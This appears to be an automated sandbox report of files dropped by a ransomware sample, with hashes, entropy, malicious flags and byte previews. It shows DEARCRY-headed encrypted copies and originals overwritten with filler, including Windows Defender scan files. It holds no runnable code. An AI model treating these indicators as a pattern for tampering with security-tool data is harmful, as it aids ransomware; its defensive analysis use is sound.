                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):65832
                                                            Entropy (8bit):7.996544174206803
                                                            Encrypted:true
                                                            SSDEEP:1536:YOVUyo+IF74xXbdk50DwjwKTQDviBJ5WKbbsZ1O:YOVUyo+IGhbdk5aNKkoTWc0O
                                                            MD5:F1F73D99B3FDE2817DBAF5E9EAAA2663
                                                            SHA1:273C064AC8F01AB8B3B702EE2BEF677BC55CEBF2
                                                            SHA-256:80BF06FAE563E3BF86DF1FF982CC037F24CCB5A7C071532F3AAC0396BFF57A4E
                                                            SHA-512:27AB17A3110C4277BB88DDCEEFEFD227CF935F23E292CBADCD55213314A975493C8E6F71F57AB627A4D06CD3C4952C5C0503BC499587974FADA7D3C4FF578336
                                                            Malicious:true
                                                            Preview: DEARCRY!.....>`y.C.....)..:0.\..z.n/.<.....vE.HdP..d<....3...".#....H..%tZ..W...h....^.a..m.u.,..f.`.!o.P.......y...w1y.k.C\..R.../..e.|N......... -..j6..g>..[..u..Ab.u.....,. z]....6NT3....j....*.....v.#...y....\.y..zr.......?`....3..6.M..1UCi.&.A......................."...:.....Tr..A........Z...T.J..%4...!.2U..O0).J9xV>^.V-..'..r........#."....]u':...y.......0..zV.?">x..C.Y...#.t..F...j.|.v..).....M...f..S.37.'.0..+.k...=...VV..k../..b.?>`8_5....?S.<.E.p.=.z.qNw...v..X..}..f9......O..n...J.QU.,K.z..Tax\n6.S`.!.bD...P&.F....aiQ.4.......c....X.,~,.3.%.........xQk......j8..p.Q.h...0..E......YpU3.t..d.X.^.L...#.Z..U.u!..Z^....m....gc..8<....`G7.).}|...W..2.d...}4...l[J3.Q..h...&B..l-..|. ...0...Zk.R.H?^So.;..$......$.L>...Y.r..g..YB..........B|;..x.$....grD......0h.Lf..d}.7. ...P.Ca.=._!...!wu2.~.R.g...p..^~Y;..&O~f.t..Rk.fY......)..@C../....9..uX..3.,...['..:).JC.c+J.......S..bv..L..)....#.......b.k..oA9r3.m.....8....L...le.:......u......].
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:314E20944390BDB0D80B57257C3F1571
                                                            SHA1:1F76C4B46E1EA5618431A77DF20CD1CD33B77A7F
                                                            SHA-256:156C38442089C1323D3E3BA549A6AC24341C47E8B6367BEC4740C9B8C865826E
                                                            SHA-512:C8BD5B55AE22FA12FFA48686818BFDF83EDE790CF7F7E7C113BBA8B01FB64D9C52D068117EE9AC3FB4BD5295759D73590DB2D4E56038E989A95DB8F91F200B83
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):65832
                                                            Entropy (8bit):7.996905538024504
                                                            Encrypted:true
                                                            SSDEEP:1536:dLsCfMHswh0J24aPpzU6nK3pMFJswjJzrV9UpyuwXfCraD7snV:+Xfh0wRy+FWmJ/7UpyuwXq2D7snV
                                                            MD5:8C54BE040E85BCE8B40CBE9CDACC6E3B
                                                            SHA1:1A632D08DEB2FDC07708F3CBEC13C90DA58E700D
                                                            SHA-256:48B3305671DEA331DFFD25F8F22A240DCC62CD51167F3BD83B7C3E51EC5978DD
                                                            SHA-512:43715E4DD36C9B5AFCFF7A942679FA3D3663640B2B7D8B2AA5F87B25E2DE9799D0CA2D43D163CCF2EE023637D0667A895727ED953676DE1EAADE79225D833505
                                                            Malicious:true
                                                            Preview: DEARCRY!....`..Q_.<..}!...b....\s.Zq..6:......1p..P<C.k.0...e;..?.Jj^.@...'....w....._..&.AA.P.6d.u.A...[....>.3.9.H.1...G....5..V....K$\....gD...z.....Q..$ B<xq.?P,../p..R*...9..<..-........B..........E..T.R....9..,..._..,...A.M..Pz....a.'..&j..............>R']..6.>..?.guI..{K.'+.3..\..P.....n..w..t.;...N....9.>p4.T....v.VK.2^8C.*.[.}*...ehUL>Dc...m!1;A.&......Z_..o..Z4..).0..1)..qb..Ci.Y.*y..j..G..S.<8.g@..`....(....H%..5..S..Ya...9..\..6*."..S..;.I.t>.$.......M6...+...;.K^.5..H......l:l.A......?w.8.......>....JV|cD.=..}.h.9.........MZJ.v.).9....E#.........;1.....[...,...Gs......z.-.DP.V@.;e.5. ..,.-}..$......0.~H....O.eq.T...o........F?.....!.....C..v\.e.6f..}.e.'Y.ah{...-{.......bj.RL.-.MW.".N......."...k....2&...G..Y..<..+.....+n.cm~.E.T._....|}...H.._...e...Lj;..;..J..yR#ej.D....x..R.>.z.......(.u|.x ..I.x.y.K.......U....m3E...2....X. $&.F...K.w..p..6g....?.H.L........w...9.<9q.....h...S....d.cJ..ksk..NQX~$V0..W.7..>G
                                                            C:\ProgramData\Microsoft\User Account Pictures\defaultuser0.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1776
                                                            Entropy (8bit):7.757125649483631
                                                            Encrypted:false
                                                            SSDEEP:24:sEfJ5VxiGV6COKmdCQMN0AwboG4JeOxi5+96ReCgZWee+mLwDR1CRMgYQfAvaiJz:sEhEvdC70Jh4rN96gCrwV8MgRyaKz
                                                            MD5:CE709C1DF4412526F8B37551B570C5C5
                                                            SHA1:07D1DAF38CFFE4E1CA6BEE5263DB44D55574B829
                                                            SHA-256:817F3A93AC1CC2A0CFFB818EC9AA95EFDEAFB16E2B80FAFECC1F00A6A1296FB7
                                                            SHA-512:63D847DF13928DB6DE710022928C46214807B81242AAEA767E97FBA5841BACFE28DC34F384A41905C52B995FC6F65E28CE11FF9E35A8271766FD6D757B04312D
                                                            Malicious:false
                                                            Preview: DEARCRY!.....Sj.SJ.l.WJ.I$..%...(gS...f.....,v.6!.. ...dmtE.....>..k.I3V.....8.d/."}j.#^.......&.....rYaX.gvUOb..l..7.4...@.<(~..wu..........t..y-...... ...qb..~9.T..b*.Ov.....NO....n.~..-..[.....n..!..V..ye.....j..Z#......c...#".....[]..i...s.R@.....i..k............V\.;.Gk....o$.n.DEARCRY!.....sKf...q.u.i....Z<.xmU.7....}...._...jHZ.%...J;0n.."K..w..@..[....Gs.z.S`.#..^.....=.8.K7E...*Xi...@.=C0&....R*f...uQ........d.g-.....b.}!.5m8/^cnv.p..Y;..]..O.P....3..h...T....iQ...+r...}...].v....n......X[.e..tc..v'n.4.e....To.......*i.g.................0...]...j...DEARCRY!...........hc9>w0P...Bba21....z.mQ....4..kMwC%C...,../.......Q8t...uP*n..4..j.c..9.K....<&..%...).=3mG....i4.^..U6.....V.xC.....6@.X.%..=h.....C\'.g|I/..\.F8.FZ..>..,J.....O.i...s%^5...zk.R..d.Y.,....&....vL 2...E..x.........KIN....w.".s..N.h!...............x.z.....!l.q..DEARCRY!.....$o.+h3#..S.z.l...w.....j........)Lj.......LX.f.%:.n*z..j.O.. .......osXp...<]QR..Ri.<.B.s.|I.
                                                            C:\ProgramData\Microsoft\User Account Pictures\user.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):296
                                                            Entropy (8bit):7.100873396456149
                                                            Encrypted:false
                                                            SSDEEP:6:rOkVQvaO60fO3DSKh7kmD7tk7/PdvzPBeHIcp+/GfG/:rOZaO6LzNJ7tkDPtjjcp+/3
                                                            MD5:ABB978C69FA7813BDA62AC9EB48CC10B
                                                            SHA1:91344D646931313F416F5B0D00309A0CAC4D8890
                                                            SHA-256:E735C7F0E995A0D900D240DD70B79B2DA724EFE20F614B7EDE70AA8299968B13
                                                            SHA-512:535377F7E9006780F6CFE2373978F0F81653ED3511644742E5A201F3EB54ECD714141B54BD2BE19B49E418AAC8EE20B8F1008AF5356AAB1D3E50477E5650EBD6
                                                            Malicious:false
                                                            Preview: DEARCRY!....C`....0s$.4..W...=.....d99....Al.......=z|...........+....!__...P.n...F..4g.7...J...|..,.Y.`.H.^.sm..eW.....^..+.6...9....m....M....Z..|Y.......5h......|.[..*/.g9v...I.....K....h7.T....|........j.D.....$n.he..d......<..##{..v_.=..!..fS...a..............E......FEk,(..
                                                            C:\ProgramData\Microsoft\User Account Pictures\pratesh.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):296
                                                            Entropy (8bit):7.145500514395634
                                                            Encrypted:false
                                                            SSDEEP:6:rOkFzJPzBsxo9DLtrQnExwxV8378AckVjsmjKmIe3TaSJebGon:rOeJ9sx2nKnEz3csKmIA6n
                                                            MD5:93EE3EBDE5A90CF2A038A972034085FC
                                                            SHA1:15F239F5D6BDBED9FA9FBC38D93851611984DE19
                                                            SHA-256:F299BB8C64EC7F964E1BF64AE25DBC9A77F42E5158811A99EBC849E2D0877AB2
                                                            SHA-512:7EC61562B52DC9F4D5D43EF654D58A68CD948FC813C22B12517F7D124BE565E3C6B3DAC377C26F096F6701D342C92C41F1D0E4E7FAA4FD0BD1FD897AB03FC99D
                                                            Malicious:false
                                                            Preview: DEARCRY!.....Y........2:K@..E.J^.0..VZ.<....z"_.7.....0.0.5.%5...V%..-..=....W..&$1.a.!..9[^...v[d........=..iL.7Jl(.....wY..!U^[.M.S.b...$........,...Mj7.>...Mp.`.).......p...g.9J.....05&.5o....l`z.....m}A.Q.F ...j_p..<...Mp....e...&.Dg.=..i...<x.....Gy................,.l>>.@...i.
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):168
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk4:Y2
                                                            MD5:6E46EE414433C0352C469146A669673F
                                                            SHA1:7079695A8B2BEC1055B2E1D28DDCFC8383081183
                                                            SHA-256:F9E5E27D7ABB02843284A33AA88293B2192D07A012EB93C44ACD2FFBDB0C4CFA
                                                            SHA-512:40DDD9A65AA56A6D7E15BFFFCCE6F47204BA8662DA00757C6A317D58AB45103F497E7537EE01751A32A57334B76AE75E495F281E1FEFAE06A6EE0C72C520E708
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.496681045391977
                                                            Encrypted:false
                                                            SSDEEP:12:rOIMfT7V/c6oji4sE0MqlzI8swJO71ZXV+eGu:shBojbslMzwJOCu
                                                            MD5:89173C0DE9156502F7E8D6265BA48281
                                                            SHA1:13FDCBCDBA775D7319C5ED379BEF74C8F1BE8F80
                                                            SHA-256:E32103AB206C7C2AEE2B74E63BB40210D2D3C888BC01EB894E294C1882E8D939
                                                            SHA-512:C88E27AF23B19484A557BF4CB54FBDD914CEBE76D822916632FE80F99EF4D64520262770F4D89B4A199CE75A7293B61C36B27518620675DDBF30BF08CC7CBA40
                                                            Malicious:false
                                                            Preview: DEARCRY!.....CC.=..z....^/.a...X.x).v....."..J..^.......#^.....$'......<....%v..XV.qY..G........=Z.E.....^........U....]V...3.ZY&..Gy)1[....|O~A...(.i..P...w....Y........v..J\3+Q.<vz.tw.@8..6.W.7._.t./...:.N....n.Ek.IJq..3A$.l&-..6gn..H0..B.p...d'.k...0....................^a^7.."....."....-....e.P.....A..C^.+..>..*.}...jR.......p....Wfr.6TY7.I ..|...-xH...6.m.VT.....J...z.Bv.........`H...nJh.....t.5.Y...S.]6.a...._....G{.q..u....\.3..
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):112
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkg:Ye
                                                            MD5:2EC535EDAA45DEEF6987F8E781631B41
                                                            SHA1:2760153E60CB7BC96EB59A04ED2DB5DE4A94EDB2
                                                            SHA-256:64BDC48C731313C7B37C1F1D13D6265AC7A2604FF630B50F591A86E610CB3005
                                                            SHA-512:1A008B0480A4EB64D292DB671D4F43F46FC57E077B72AD3EC0A3B0B63B320357A11418EA916038E9B659CCF39AE574EF8A8F683F1EFF954788591C13022FCD81
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):408
                                                            Entropy (8bit):7.422983592322712
                                                            Encrypted:false
                                                            SSDEEP:12:rOANSYnYXkNxWt8isM17+DqVvY9qN69CRe4:LY0Nxm8ijyxUoU
                                                            MD5:7B7546F296399AF224FD00C79439EE98
                                                            SHA1:164F22CEE7271B79E409D113E624208CD8A22102
                                                            SHA-256:52ECA0A994F7776810E1104F2D06B5ED98D317473D5FD3E232D1083445855251
                                                            SHA-512:A7B3B0F82984CA498D07ECC2FE394B8F2B40C997D43B407D329B15FDA898BC034BBBA51434C630ADABD5825E806DDBDADE98E6C6D7D3F01C0463551BCC85AB9F
                                                            Malicious:false
                                                            Preview: DEARCRY!.....'5.x..M.&.'b....\D_...L.2......-....?.....a..Z......@I.&1.L.J$m.[m..J....E..2.r.'...P...i.....8......l8F......QZ.i....j..e3.M..P.M..n........P.>...S..2...\...M.jlO..g.L6V.../Z...U.fx.x.M.7<.i....[....Sz.do..j..W.....U.......A......C..=...D......p.......U..d...#.+..->.....2..k.E..T.uOs......l........_...N).8...b..A.8.....<._.../J[-..b.!.7..V.X....b.S..3B...48Dx.ls...4..}.
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):35616708
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk:YC
                                                            MD5:D8D362A172BD5C62BC6790944D8E6E4C
                                                            SHA1:693D84727886A8EBD098CD67771994E0E6ED07D1
                                                            SHA-256:45491FC1F9D40A9946E071160D48CBC3AC2B772639F3D63F5B51D64F7BC084E0
                                                            SHA-512:A14B80729BB80E7B8A9CB8A9B3755CCF16F71B2E1B0C324FE2AE4A9B9D44EE7E1A61AA59A68B6083ADC40BE8B08541A981E17711E0EFEE9659D251FBDE443FA1
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CE
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):281392
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6BCB0B9036172BA14599C1E5AEADC523
                                                            SHA1:1B1EAA58524BBF21B087A29EAA11C5E355E0F470
                                                            SHA-256:5212E4ED8A17AC5BA714FB7659798782B5E1301C8F858021051AA0B0FEFAC387
                                                            SHA-512:80CD9F6F1866A4E2A0BD867A7F6ECAE6DE5CD0B7A639FC7D848AE4174293215ABA4ABD6B5FE807733C6EF17F0F74600A2E2273393BB65ABFFDA99CA8855303C8
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CE.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):281688
                                                            Entropy (8bit):7.999440863274814
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:C8FBEA45A4C6ECC9C6F84CB368E2BC36
                                                            SHA1:10972458DA85E29D1D989972E56F2ECC235878CE
                                                            SHA-256:91E385A017AE056536FF1047A3C660E3D29704F17095D99736BB0206E33E2BDE
                                                            SHA-512:C0C04FCB8F037B15892DF9EA1FD00BF308D7CFA8D5214CDC9755D8025BE30221A00DC0F34802374F49B116FFBE06E7C77172E427B19299C6A927EB5FD880F121
                                                            Malicious:true
                                                            Preview: DEARCRY!....j.......s..u.......x.6....d..'......H..(..F.p=.z..1n|h..V..9....6k^u8..#...2..C_.j3.A.....S..h.....=..7......C..zD(........6...t.3..r.+...O|.4...Q.....}:a.~..`.[.#....i.7.H.~C,LJ5.}...4m..*9'....a....8....J........."...[;...2.LTGc..MV...C$....0K........#.`..Ur........h...6G..K........t......h4.GY..R.....>.....=.Y....lJ..;.J..[.......R.i}.yE<..^.vu.3&.....~..@-...ev...J...Y.. (.8_*...T?ab..?...=.$..{F.&k.I.i_(....;...1xQ...9"?W.x....Mx.,7.#.K.....it..4l.~y.Pi.G....x?...K..O.!..3...E`...p.<."N..b..2.A.C.......[7...D...`..A..\.d....yu./..4.D....+..].....3..+.J..K.G...._.w@V....|o...D.qx.}......$.HEJ...0..!.B..X..V3.3.,9.N:.8.u.h....(.K.a..#zy..syt..-..8./.'.8..&#q......3..._..n.[B..k......6.....tp.....M...Z%..X.f...S....f......UT4.Xl,.K...~.....AW.Y..Ic.........9.L6.V....>.H.U.&."........A........R._.....3.'..D..7!.........<L.'c8..[m.-...2.$`...x[./.xz%G.&...K...r4.....?..m'...O{.....|...fK%.$h.E.....\...]'...Coo
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):39812144
                                                            Entropy (8bit):7.999995987835618
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:FEFC7E6AFD34AC0815E0DF229C1CF0BE
                                                            SHA1:19F97480D7174E98AF5F74CB4A7433C0BBB99088
                                                            SHA-256:F7F92DC7C266844FB789B293F4A1049B8C3F7622D48A9D096105E471009AC4E4
                                                            SHA-512:C1325FC4389C25F8DE16F53E27472DE66CB0DFFCF01C21CD69D2495C2007773181F5EA027430A4E29B22E52D202581CA52200802A339F42FE8C68B5D115CE55B
                                                            Malicious:true
                                                            Preview: DEARCRY!....<-O.._^.)>..[.R..T....T....pC.......(Y...d....25t....%<..........:..:......`r..r...@?..ln.tv?Q...<.<.>....*m..}..t. ....{z.kF.C%.kfK...{..c....s...G.c..?...f.KR..m.......E.........YF.qM{.5+J..K..!.'..T.......,R2.t4sE.hA0..V"....CR..7.. !5......'........rt...GH....#.z........n.4....~.... i..7e].b8...89r..9UF.....t.6.$.G....L.z...n.z...z...'.LL.}..{2.h..SX..cl...%...]xcUV.h....-...H.@M..N...j..v.b$q.e.......A,..s..<j.'......)8.P.wU}..#.......-_t.bsf...Y.........._......:D......7.w.F3...q.;.W....@..CK>..o......Y*&......@.Q.....Zc.I..........."'n.\.R...".;^q.>H...a..R.)...Og.F..........x..*..?......V...W..\..Z..r~..........&.)^...Zr.M.a&.D...+.'....g...>{..E.....^.DC1.t......-..~.cX.V..3.s...R.4s.DF..uq.9(..o...Oi..kK..T.........ww....g....4...=\W\[u.#.#.K2k.>5vu.A......*.k9...M.u.P.........CoM.@"v.1....t..L&...f...E'OQ.5..f-:...k.fD.:q.7I...t.^.....R..i..b.5^pw.".K..`..O.......F..F..y....T..5...R..D5...h).$...N36fD.:....
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):544768
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6841362D352FA864D944709FE482387C
                                                            SHA1:06A481534A0CC2C1FAA493E87050A105BE7AC507
                                                            SHA-256:8023205A48CA31158E2DE7E1DB097F5B2CA773ADB5F0DF428E198DCAD4DBB1A1
                                                            SHA-512:C5F551BF9DBA649816CC45F4E556B9CB403A397258122E22DC4CA023A882BC8DAF65CD61FE2C4995F6818844E3B0AFE73F30E99EC156EC5C21D4083BB61EC5FE
                                                            Malicious:true
                                                            Preview: 